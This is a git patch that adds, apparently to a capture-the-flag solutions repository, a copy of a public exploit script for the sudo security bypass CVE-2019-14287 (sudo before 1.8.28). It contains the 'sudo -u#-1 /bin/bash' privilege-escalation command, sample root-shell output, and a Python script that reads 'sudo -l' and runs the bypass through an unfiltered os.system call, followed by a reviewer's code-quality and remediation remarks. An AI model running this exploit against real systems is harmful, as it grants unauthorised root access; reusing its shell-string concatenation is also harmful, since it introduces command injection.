From 8e07e852ee302516e02e8d2773ca45538c28910e Mon Sep 17 00:00:00 2001
From: Raghuram Subramani
Date: Sat, 17 Sep 2022 21:21:29 -0400
Subject: add agent_sudo
---
agent_sudo/47502.py | 80 +++++++++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 80 insertions(+)
create mode 100644 agent_sudo/47502.py
(limited to 'agent_sudo/47502.py')
diff --git a/agent_sudo/47502.py b/agent_sudo/47502.py
new file mode 100644
index 0000000..907d29a
--- /dev/null
+++ b/agent_sudo/47502.py
@@ -0,0 +1,80 @@
+# Exploit Title : sudo 1.8.27 - Security Bypass
+# Date : 2019-10-15
+# Original Author: Joe Vennix
+# Exploit Author : Mohin Paramasivam (Shad0wQu35t)
+# Version : Sudo <1.8.28
+# Tested on Linux
+# Credit : Joe Vennix from Apple Information Security found and analyzed the bug
+# Fix : The bug is fixed in sudo 1.8.28
+# CVE : 2019-14287
+
+'''Check for the user sudo permissions
+
+sudo -l
+
+User hacker may run the following commands on kali:
+ (ALL, !root) /bin/bash
+
+
+So user hacker can't run /bin/bash as root (!root)
+
+
+User hacker sudo privilege in /etc/sudoers
+
+# User privilege specification
+root ALL=(ALL:ALL) ALL
+
+hacker ALL=(ALL,!root) /bin/bash
+
+
+With ALL specified, user hacker can run the binary /bin/bash as any user
+
+EXPLOIT:
+
+sudo -u#-1 /bin/bash
+
+Example :
+
+hacker@kali:~$ sudo -u#-1 /bin/bash
+root@kali:/home/hacker# id
+uid=0(root) gid=1000(hacker) groups=1000(hacker)
+root@kali:/home/hacker#
+
+Description :
+Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv
+-u#-1 returns as 0 which is root's id
+
+and /bin/bash is executed with root permission
+Proof of Concept Code :
+
+How to use :
+python3 sudo_exploit.py
+
+'''
+
+
+#!/usr/bin/python3
+
+import os
+
+#Get current username
+
+username = input("Enter current username :")
+
+
+#check which binary the user can run with sudo
+
+os.system("sudo -l > priv")
+
+
+os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary")
+
+binary_file = open("binary")
+
+binary= binary_file.read()
+
+#execute sudo exploit
+
+print("Lets hope it works")
+
+os.system("sudo -u#-1 "+ binary)
\ No newline at end of file
-- cgit v1.2.3
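Review bot: The value read from the `binary` file is concatenated into the final `os.system` string unfiltered, so it still carries its trailing newline and every line that matched `grep 'ALL'`; any extra matching `sudo -l` line is then handed to the shell as a separate command, and reading one stripped line with `binary = binary_file.readline().strip()` avoids that. The `#!/usr/bin/python3` line sits below the docstring, where it is only a comment, and it has to be the first line of the file to take effect. `username` is read and never used, `open("binary")` is never closed, and the scratch files `priv` and `binary` are left in the current directory with the `sudo -l` output in them. The header comments would also be clearer if they stated the precondition the docstring only shows by example, i.e. a Runas spec of the `(ALL, !root)` form on sudo before 1.8.28, with upgrading to 1.8.28 as the remediation.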